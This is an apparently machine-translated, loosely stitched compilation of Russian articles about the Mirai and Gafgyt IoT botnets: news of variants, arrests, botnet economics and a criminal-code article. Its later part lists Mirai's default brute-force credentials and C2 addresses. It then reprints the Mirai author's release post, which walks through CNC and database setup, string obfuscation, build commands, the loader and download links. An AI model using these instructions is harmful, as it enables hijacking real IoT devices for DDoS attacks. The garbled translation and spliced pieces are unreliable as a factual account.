The two most famous and common IoT-botnets - Mirai and Gafgyt - continue to "multiply". New variants of these malicors were found, aimed at the corporate sector. The main danger of these cybergroms is well organized and sufficiently powerful DDoS attacks.
The reason for this prevalence of these two malware lies in the fusion of the source code, which has become available to the public several years ago. Beginner cybercriminals immediately began to invent their malicious programs based on it.
In most cases, due to the incompetence of intruders, Mirai and Gafgyt clones did not represent any serious projects and did not carry significant changes in their capabilities.
However, the latest options of botnets demonstrated a tendency to infect corporate devices. In the UNIT 42 report, Palo Alto Networks teams, it says that new Mirai and Gafgyt samples have added a number of new exploits to their arsenal, which use old vulnerabilities.
Mirai now attacks the systems on which the unpractorated Apache Struts is launched (this is how it was hacked last year). The patch for the CVE-2017-5638 breaks has existed for more than a year, but, naturally, not everyone has updated its installation.
In total, Mirai at the moment 16 exploits, most of which are designed to compromise devices like routers, network video recorders and various cameras.
Gafgyt (also known as Baslite) also attacks business equipment, focusing on the recently discovered CVE-2018-9866 vulnerability. This critical safety deficiency affects the unsupported version of the Global Management System (GMS) system from Sonicwall. Unit 42 researchers recorded new samples on August 5, that is, less than a week after the publication of the Metasploit module for this vulnerability.
The affected GAFGYT devices can scan other equipment for various kinds of security problems, as well as attack them known exploits. Another type of attack, which can make this malicious - Blacknurse, is an ICMP attack that greatly affects the CPU load, which leads to a refusal of maintenance.
Experts also found that these two new botnets were placed on one domain. This proves that behind them is the same cybercriminator or their group.
At the end of last month we reported that. Such data are given in the Global Threat Index report for July 2018.
And this month, law enforcement officers revealed the personality for one of the most famous Mirai receivers - Satori. It turned out that, cybercrime was currently charged.
Mirai botnet attacks on the American DNS provider DYN in 2016 caused a wide resonance and attracted increased attention to botnets. However, compared to how modern cybercriminals use botnets today, attacks on DYN may seem like children's cereals. Criminals quickly learned to use botnets to launch complex malware, allowing to create entire infrastructure from infected computers and other devices with Internet access to obtain illegal profits on a huge scale.
In recent years, law enforcement agencies have achieved certain successes in the fight against criminal activities related to the use of botnets, but so far these efforts are, of course, are not enough to punch a sufficient breach in botnets under the control of cybercriminals. Here are some known examples:
- The US Department of Justice has presented with two young people for their role in the development and use of Mirai's botnet: 21-year-old Paras Jha (Paras Jha) and 20-year-old Josiah White. They are accused of organizing and conducting DDoS attacks on companies, and then the requirement of redemption for their termination, as well as selling these companies "services" to prevent such attacks in the future.
- The Spanish authorities in the framework of the cross-border operation on the request of the United States were arrested by a resident of St. Petersburg Peter Levashov, known in cybercrime circles like Peter Severa. He ruled Kelihos, one of the most long-standing botnets, which is estimated to have infected about 100 thousand computers. In addition to extortion, Peter Levashov actively used Kelihos for the organization of spam mailing, taking $ 200- $ 500 per million messages.
- Last year, two Israeli tinacegers were arrested on charges of organizing DDOS attacks for remuneration. The couple managed to earn about $ 600 thousand and spend about 150 thousand DDoS attacks.
Batnetnets are computer networks consisting of a large number of computers connected to the Internet or other devices, on which the autonomous software - bots are downloaded and launched without the knowledge of their owners. Interestingly, the initial bots themselves were developed as software tools for automating non-priminal monotonous and repeated tasks. Ironically, one of the first successful bots known as Eggdrop, and created in 1993, was designed to manage and protect the IRC channels (Internet Relay Chat) from third-party attempts to capture their management. But the criminal elements quickly learned how to use the power of botnets, applying them as global, practically automatic income systems.
During this time, harmful botnet software has developed significantly, and now can use various attack methods that occur simultaneously in several directions. In addition, "Botonomics", from the point of view of cybercriminals, looks extremely attractive. First of all, there are practically no infrastructure costs, since it is naturally used to organize a network of infected machines and other equipment with support for Internet access, naturally, without the knowledge of the owners of these devices. This freedom from investments in infrastructure means that the profit of criminals will actually equal to their income from illegal activities. In addition to using such a "profitable" infrastructure, anonymity is also extremely important for cybercriminals. To do this, upon the request of the redemption, they mainly use such "non-monitored" cryptocurrency as Bitcoin. For these reasons, the botnets have become the most preferred cybercrimal platform.
From the point of view of the implementation of various business models, the botnets are an excellent platform for launching various malicious functionality, bringing illegal income from cybercriminals:
- Fast and large-scale distribution of emails containing extortionable programs requiring redemption.
- As a platform for winding the number of clicks by reference.
- Opening proxy servers for anonymous Internet access.
- The implementation of attempts to hack other Internet systems by the method of complete extinguishing (or "rough power").
- Conducting mass mailings of electronic letters and the implementation of the hosting of substrate sites under large-scale phishing.
- Library of CD keys or other licensed data on software.
- Theft of personal identification information.
- Getting credit card data and other bank account information, including PIN codes or "secret" passwords.
- Installing keyboard spies to capture all data that the user enters into the system.
How to create a botnet?
An important factor contributing to the popularity of the use of botnets among cybercriminals in our time is the relative ease with which you can collect, change and improve various components of malicious botnet software. The ability to quickly create a botnet appeared in 2015, when the original Lizardstresser's source codes were generally available, tools for conducting DDoS attacks created by the famous hacker group Lizard Squad. Download botnet for holding DDOS attacks today can any schoolboy (which they are already doing, as news publications worldwide).
Easy to download and easy-to-use Lizardstresser code contains some of the complex methods for the implementation of DDoS-attacks: keep open TCP connections, send random strings with garbage content of characters to TCP port or UDP port, or re-send TCP packets with specified Flag values. The malicious program also included a mechanism for arbitrary launch of the shell commands, which is extremely useful for downloading the updated versions of Lizardstresser with new commands and an updated list of controlled devices, as well as to install on an infected device of another malicious software. Since then, the source codes and other malware have been published for the organization and control of botnets, including, first of all, on Mirai, which dramatically reduced the "high-tech barrier" to start criminal activity and, at the same time, increased the possibilities for profit and The flexibility of the use of botnets.
How the Internet of Things (IoT) has become a clondike to create a botnet
From the point of view of the number of contaminated devices and the traffic generated during the attacks, the explosive effect had a massive use of unprotected IoT devices, which led to the appearance of unprecedented botnets. So, for example, in the summer of 2016, before and directly during the Olympic Games in Rio de Janeiro, one of the botnets, created on the basis of the Lizardstresser software code, mainly used about 10 thousand infected IoT devices (first of all - webcams ) To implement numerous and long-lasting DDoS-attacks with a stable power of more than 400 Gb / s, which has reached 540 Gb / s during its peak. We also note that, according to estimates, the original botnet Mirai was able to compromise about 500 thousand IoT devices around the world.
Despite the fact that after such attacks, many manufacturers made some changes, IoT devices are mostly still shipped with pre-installed factory settings of the username and password or well-known security vulnerabilities. In addition, in order to save time and money, part of the manufacturers periodically duplicate the hardware and software used for different classes of devices. As a result: the default passwords used to control the source device can be applied to many completely other devices. Thus, billions of unprotected IoT devices are already deployed. And, despite the fact that the predicted growth of their number slowed down (although insignificant), the expected increase in the world park "potentially dangerous" IoT devices in the foreseeable future cannot be shocked (see the chart below).
Many IoT devices are perfectly suitable for unauthorized use in criminal botnets, as:
- For the most part, they are uncontrollable, in other words, work without proper control by the system administrator, which makes their use as anonymous proxy extremely effective.
- Usually they are online 24x7, which means they are accessible to the implementation of attacks at any time, and, as a rule, without any limit on throughput or traction filtering.
- They often use a trimmed version of the operating system implemented on the basis of the Linux family. And the harmful botnet software can be easily compiled for widely used architectures, mainly ARM / MIPS / X86.
- The trimmed operating system automatically means less opportunities to implement safety functions, including reporting formation, so most of the threats remain unnoticed by the owners of these devices.
Here is another recent example, which will help to realize the power that modern criminal botnet infrastructures may have: In November 2017, the Necurs botnet made a new strain of the SCARAB encrypter. As a result of the mass company, about 12.5 million infected electronic letters were sent, that is, the rate of distribution was more than 2 million letters per hour. By the way, the same botnet was seen in the distribution of Dridex and Trickbot banking Trojans, as well as extortion viruses Locky and Jans.
conclusions
The fertile situation for cybercriminals in recent years related to the high availability and ease of use of more complex and flexible malware for botnets in combination with a significant increase in the number of unprotected IoT devices has made criminal botnets the main component of the growing digital underground economy. In this economy there are markets for the sale of maliciously obtained by illegal data, making malicious actions against specific goals as part of the provision of employment services, and even for their own currency. And all the forecasts of analysts and security specialists sound extremely disappointing - in the foreseeable future, the situation with the unlawful use of botnets to obtain illegal profits will only worsen.
Eternal paranoid, Anton Kochekov.
See also:
Last week, the source code of the components of the Mirai botnet-used attacks of up to 1 TB / s took place.
art. 273 of the Criminal Code. Creation, Use and Dissemination of Malicious Computer Programs
1. Creation, distribution or use of computer programs or other computer information, knowingly intended for unauthorized destruction, blocking, modifications, copy computer information or neutralizing computer information protection, -
they are punished by the restriction of freedom for up to four years, or forced work for up to four years, or imprisonment for the same period with a fine of up to two hundred thousand rubles or in the amount of wages or other income of convicts for the period up to eighteen months.
2. Acts provided for by the first paragraph of this article committed by a group of persons on a preliminary conspiracy or organized by a group or face using their official position, but equally caused major damage or committed from self-interest, -
are punished by restriction of freedom for up to four years, or forced work for up to five years with deprivation of the right to hold certain positions or engage in certain activities for up to three years or without anything, or imprisonment for up to five years with a fine of thousands of up to two hundred thousand rubles or in the amount of wages or other income of convicts for the period from two to three years or without any and with deprivation of the right to hold certain positions or engage in certain activities for up to three years or without any.
3. Acts stipulated by parts of the first or second of this article, if they led grave consequences or created a threat to their offensive, -
shall be punished with imprisonment for up to seven years.
This botnet consists mainly of cameras, DVR devices, etc.
Infection occurs quite simple: the Internet is scanned to open 80/23 (Web / Telnet) ports and climb the scarecrowded accounts.
Few of users are changing passwords of embedded accounts (if possible), the poet botnet is continuously updated with new devices. If you can change the password from the web interface while in it, then the password and the very presence of Telnet access from many users simply eludes.
The most commonly used the following accounts:
enable: System
Shell: sh
Admin: admin
Root: XC3511
root: vizxv
root: admin.
root: xmhdipc.
Root: 123456.
Root: 888888.
Support: Support
Root: 54321.
Root: juantech
Root: Anko.
Root: 12345.
Admin:
Root: Default.
Admin: password.
root: root.
root:
User: User.
Admin: smcadmin.
Root: Pass
Admin: admin1234.
Root: 1111.
Guest: 12345.
Root: 1234.
Root: password.
Root: 666666.
Admin: 1111.
Service: Service.
Root: System
Supervisor: supervisor
Root: klv1234
Administrator: 1234.
Root: IKWB.
Root: ZTE521
After receiving the access, the command center receives a binary notification of the presence of a new bot:
4a 9a d1 d1 \u003d xxx.xxx.xxx.xxx (here was the address of the host)
05 \u003d Tab.
17 \u003d 23 (Port 23 Telnet)
05 \u003d Tab.
61 64 6D 69 6E \u003d UserName: Admin Admin
05 \u003d Tab.
61 64 6D 69 6E \u003d User Password: Admin
The components of the botnet are designed to work in different environments, which they say the identified samples:
mirai.arm.
mirai.arm7
mirai.mips.
mirai.ppc.
mirai.sh4.
Command Servers are currently fixed in the following addresses:
103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11
Instructions for creating a botnet is quite simple, bring AS IS (source http://pastebin.com/e90i6ybb):
GREETZ EVERYBODY,
WHEN I FIRST GO IN DDOS INDUSTRY, I WASN'T PLANNING ON STAYING IN IT LONG. I Made My Money, There's Lots of Eyes Looking AT Iot Now, So It's Time to GTFO. HOWEVER, I KNOW EVERY SKID AND THEIR MAMA, IT'S THEIR WET DREAM TO HAVE SOMETHING BESIDES QBOT.
SO Today, I Have An Amazing Release For You. With Mirai, I Usually Pull Max 380K Bots from Telnet Alone. However, After The Kreb Ddos, ISPS Been Slowly Shutting Down and Cleaning Up Their Act. Today, Max Pull Is About 300k Bots, and Dropping.
SO, I am Your Senpai, and I Will Treat You Real Nice, My HF-Chan.
And to Everything by Hitting My Cnc, I Had Well Laughs, This Bot Uses Domain for CNC. IT Takes 60 Seconds for All Bots to Reconnect, LOL
Also, Shoutout To This Blog Post by MalwareMustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/201060930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Had A Lot of Respect for You, Thought You Were Good Reverser, But You Really Just Completely and Totally Failed in Reversing This Binary. "We Still Have Better Kung Fu Thant ME Laugh Please, You Made So Many Mistakes and Even Confused Some Different Binaries with My. LOL.
Let Me Give You Some Slaps Back -
1) Port 48101 Is Not for Back Connect, IT IS for Control to Prevent Multiple Instances of Bot Running Together
2) / DEV / Watchdog and / Dev / Misc Are not for "Making the Delay", it for preventing system from hanging. This One Is Low-Hanging Fruit, So Sad That You Are Extremely Dumb
3) You failed and though fake_cnc_addr and fake_cnc_port WAS REAL CNC, LOL "AND DOING THE BackDoor to Connect Via Http on 65.222.202.53". You got tripped up by Signal Flow;) Try Harder Skiddo
4) Your Skeleton Tool Sucks Ass, IT Thought The Attack Decoder Was "Sinden Style", But It Does Not Even Use a Text-Based Protocol? CNC AND BOT COMMUNICATE OVER BINARY PROTOCOL
5) You say 'Chroot ("/") SO Predictable Like Torlus' But You Don't Understand, some others kill based on CWD. IT Shows How Out-of-The-Loop You Are with Real Malware. Go Back to Skidland
Why Are You Writing Reverse Engineer Tools? You Cannot Even Correctly Reverse In The First Place. Please Learn Some Skills First Before Trying to Impress Others. Your Arrogance in Declaring How You're "Beat Me" with Your Dumb Kung-Fu Statement Made Me Laugh So Hard While Eating My So Had to Pat Me On the Back.
Just As I Forever Be Free, You Will Be Doomed to Mediocracy Forever.
Requirements.
2 Servers: 1 for CNC + MySQL, 1 for Scan Receiver, And 1+ for Loading
Op Requirements.
2 VPS and 4 Servers
- 1 VPS WITH EXTREMELY BULLETPROOF HOST FOR DATABASE SERVER
- 1 VPS, Rootkitted, for ScanReceiver and Distributor
- 1 Server for CNC (USED 2% CPU WITH 400K BOTS)
- 3x 10Gbps NForce Servers for Loading (Distributor Distributes to 3 Servers Equally)
- To Establish Connection to CNC, Bots Resolve A Domain (resolv.c / resolv.h) And Connect to That IP Address
- Bots Brute Telnet using An Advanced Syn Scanner That Is Around 80x Faster Than The One in Qbot, And Uses Almost 20X Less Resources. WHEN FINDING BRUTED RESULT, BOT RESOLVES ANOTHER DOMAIN AND REPORTS IT. This Is Chained to a Separate Server to Automatically Load Onto Devices AS Results Come in.
- Bruted Results Are Sent by Default On Port 48101. The Utility Called Scanlisten.go in Tools IS Used to Receive Bruted Results (I Was Getting Around 500 Bruted Results Per Second At Peak). If You Build in Debug Mode, You Should See The Utitlity Scanlisten Binary Appear in Debug Folder.
Mirai Uses A Spreading Mechanism Similar to Self-Rep, But What I Call "Real-Time-Load". BasiCally, Bots Brute Results, Send It To a Server Listening with Scanlisten Utility, Which Sends The Results to the Loader. This loop (Brute -\u003e Scanlisten -\u003e Load -\u003e Brute) is Known AS Real Time Loading.
The Loader Can Be Configured to Use MultiPle IP Address to Bypass Port Exhaustion in Linux (There Are Limited Number Of Ports Available, Which Means That There Is Not Enough Variation In Tuple To Get More Thank Simultaneous Outbound Connections - In Theory, This Value Lot less). I Would Have Maybe 60K - 70K Simultaneous Outbound Connections (Simultaneous Loading) Spread Out Across 5 IPS.
Bot Has Several Configuration Options That Are Obfuscated in (Table.c / table.h). In ./mirai/Bot/Table.h You can Find Most Descriptions for Configuration Options. However, in ./mirai/Bot/Table.c There Are A Few Options You * Need * To Change to Get Working.
- Table_CNC_DOMAIN - Domain Name of CNC To Connect to - DDOS Avoidance Very Fun With Mirai, People Try to Hit My CNC But I update It Faster Than The Can Find New IPS, LOL. Retards :)
- Table_CNC_PORT - Port to Connect to, ITS Set to 23 Already
- Table_scan_cb_domain - WHEN FINDING BRUTED RESULTS, THIS DOMAIN IT IS REPORTED TO
- Table_scan_cb_PORT - Port to Connect to for Bruted Results, IT IS SET TO 48101 ALREADY.
In ./mirai/Tools You Will Find Something Called Enc.C - You Must Compile This To Output Things To Put in the Table.c File
RUN THIS INSIDE MIRAI DIRECTORY
./build.sh Debug Telnet.
You Will Get Some Errors Related to Cross-Compilers Not Being There If You Haven't Configured Them. This is OK, WON'T AFFECT COMPILING THE ENC TOOL
Now, in the ./mirai/debug Folder You Should See a Compiled Binary Called ENC. For example, to get Obfuscated String for Domain Name for Bots to Connect to, Use this:
./debug/enc String Fuck.The.Police.com.
The Output Shld Look Like This
Xor'ing 20 Bytes of Data ...
\\ x44 \\ x57 \\ x41 \\ x49 \\ x0c \\ x56 \\ x4a \\ x47 \\ x0c \\ x52 \\ x4d \\ x4e \\ x4b \\ x41 \\ x47 \\ x0c \\ x41 \\ x4d \\ x4f \\ x22
To Update The Table_CNC_DOMAIN VALUE FOR EXAMPLE, REPLACE THAT LONG HEX STRING WITH THE ONE PROVIDED by ENC Tool. Also, You See "Xor'ing 20 Bytes of Data". This Value Must Replace The Last Argument Tas Well. So for Example, The Table.c Line Originally Looks Like This
Add_entry (Table_cnc_Domain, "\\ x41 \\ x4c \\ x41 \\ x0c \\ x41 \\ x4a \\ x43 \\ x4c \\ x45 \\ x47 \\ x4f \\ x47 \\ x0c \\ x41 \\ x4d \\ x4f \\ x22", 30); // CNC.CHANDE.COM.
Now That We Know Value From Enc Tool, We Update It Like This
add_entry (Table_CNC_DOMAIN, "\\ x44 \\ x57 \\ x41 \\ x49 \\ x0c \\ x56 \\ x4a \\ x47 \\ x0c \\ x52 \\ x4d \\ x4e \\ x4b \\ x41 \\ x47 \\ x0c \\ x41 \\ x4d \\ x4f \\ x22", 20); // Fuck.the.Police.com.
Some Are Port (Uint16 in Network Order / Big Endian).
Configure The CNC:
APT-Get Install MySQL-Server MySQL-Client
CNC Requires Database To Work. WHEN YOU INSTALL DATABASE, GO INTO IT AND RUN FOLLOWING COMMANDS:
http://pastebin.com/86d0il9g
This Will Create Database for You. To Add Your User,
INSERT INTO USERS VALUES (NULL, 'ANNA-SENPAI', 'MYAWESOMEPASSWORD', 0, 0, 0, 0, -1, 1, 30, 0, 0, -1, 1, 30, ");
Now, Go Into File ./mirai/cnc/main.go
Edit These Values.
Const Databaseaddr String \u003d "127.0.0.1"
Const DatabaseUser String \u003d "Root"
Const DatabasePass String \u003d "Password"
Const Databasetable String \u003d "Mirai"
To The Information for the MySQL Server You Just Installed
Cross Compilers Are Easy, Follow The Instructions AT This Link to Set Up. You Must Restart Your System or Reload .bashrc File for these Changes to Take Effect.
http://pastebin.com/1rcc3ad.
The CNC, Bot, and Related Tools:
http://dopefile.pk/a9f2n9ewk8om
How to Build Bot + CNC
In Mirai Folder, There Is Build.sh Script.
./build.sh Debug Telnet.
Will Output Debug Binaries of Bot That Will Not Daemonize and Print Out Info About If It Can Connect to Cnc, etc, Status of Floods, etc. Compiles To ./mirai/debug Folder
./build.sh Release Telnet.
Will Output ProDady Binaries of Bot That Are Extremely Stripped, Small (About 60k) That Should Be Loaded Onto Devices. Compiles All Binaries in Format: Mirai. $ Arch »To ./mirai/release Folder
Loader Reads Telnet Entries From Stdin in Following Format:
IP: Port User: Pass
IT Detects if there is wget or tftp, and tries to download the binary using that. If Not, IT Will EchoLoad A Tiny Binary (About 1KB) That Will Suffice AS Wget.
./build.sh.
Will Build The Loader, Optimized, PRODUCTION USE, NO FUSS. If You Have A File in Formats Used for Loading, You Can Do This
Cat file.txt | ./loader.
REMEMBER TO ULIMIT!
Just So It's Clear, I'm not providing Any Kind of 1 ON 1 Help Tutorials or Shit, Too Much Time. All Scripts and Everything Are Included to Set Up Working Botnet in Under 1 Hours. I am Willing to Help If you have Individual Questions (How Come CNC Not Connecting to Database, I Did This This This Blah BlaH), But Not Questions Like "My Bot Not Connect, Fix It"
In mid-September 2016, the famous journalist Brian Krebs once again narrowed the hacker underground, after which his site whose peak power reached 620 Gb / s. As Krebs reported and representatives of Akamai, which for several years provided a journalist protection and hosting completely free, the attack was carried out using GRE (Generic Routing Encapsulation) packages, which is very unusual. Specialists also reported that most garbage traffic was generated by various IoT devices: routers, IP cameras, DVR and so on.
Now Brian Krebs for the fact that the author of Malvari, thanks to which this botnet was created, published the source codes of his Trojan on the Hack Forums portal. This Troyan is known for different names (Bashlite, Gayfgt, Lizkebab, Torlus, Bash0day and Bashdoor), but most often it is called Mirai.
The author of Malvari is hiding under the alias of Anna-Senpai. In a message published on Hack Forums, he took responsibility for attacks on Brian Krebs website and said that he still did not plan to engage in DDOS attacks for a long time. Now that attacks on Krebs attracted a lot of attention to the botnet, and the number of bots began to decline, Anna-Senpai decided that it was time to make a gift to all the script-kiddi and publish the original Trojan codes so that they had at least some kind of qbot alternative.
Sources Mirai. Brian Krebs writes that Mirai is an updated version of the famous DDos-Malvari Bashlite, which has already infected the order of a million IoT devices, according to Level3 Communications. The publication of the source code journalist calls a very reasonable move from the intruders.
"The attackers who are developing Malwar often disclose the source codes in publicly when law enforcement agencies and security companies are starting to sniff out too close to their home. Publication of codes online, where anyone can see them and download them, guarantees that the author is not the only one who has sources, in the case, if representatives of the authorities come to him, "writes Krebs.
It seems that very soon the number of infected IoT devices will increase by an order of magnitude, and users will begin to complain about the reduction of the velocity of the Internet, as IoT-devices will score the entire channel of their activities, - Krebs preders. Malwaretech specialists agree with him, which are gloomy joking about socialism in the field of botnets.
Nice Thing ABOUT THE MIRIA CODE BEING PUBLIC IS IT MEAN LESS DEVICES FOR Any Single Person to Control ... Kinda Like Socialism for Botnets.
- MalwareTech (@malwaretechBlog)
On the danger of built-in devices available from the Internet, we do not allow to forget powerful DDoS attacks. One of these cyberinciders occurred when Brian Krebsh's website was hit on the site of the famous blogger and IB researcher, at the peak reached 620 Gbit / s.
At the end of last week, the problem associated with the presence of a huge army of open devices was aggravated by: the source code of Mirai's malicious code generated this powerful traffic was published on the Hackforums website.
"The news is not the phenomenon, but awareness of the attackers in the network of a huge army of devices with flaws in the configuration, such as default identifiers that are easy to use," Roland Dobbins leads, leading engineer Arbor Networks. - In fact, if we talk about bandwidth, they are more effective than general-purpose computers, as they are not aggravated by the user interface and are usually not very loaded. "
In addition, the smart device is constantly included, and network administrators, according to Dobbbs, rarely react to excessive activity emanating from such devices. "They usually work uncontrollably and deployed in networks, whose operators do not pay attention to the incoming and outgoing traffic, the expert complains. - Moreover, such devices are a great set. The attackers know perfectly well that you can make a botnet for holding powerful attacks. "
Mirai is especially dangerous in that it constantly scans the Internet in search of default and sewn identifiers. The best protection against such maliciousness is to change credentials, since a simple restart can lead to re-infection, as Krebs said rightly.
"Attacks of this type have already replaced [traditional DDOS]," Dobbles states. - IoT-botnets - by no means the coming threat. I'm not worried about the future, but the past. If I had a magic wand, I would do so that all these unreliable devices were not. In the meantime, we still have a great problem, there are still tens of millions of such devices on the Internet. "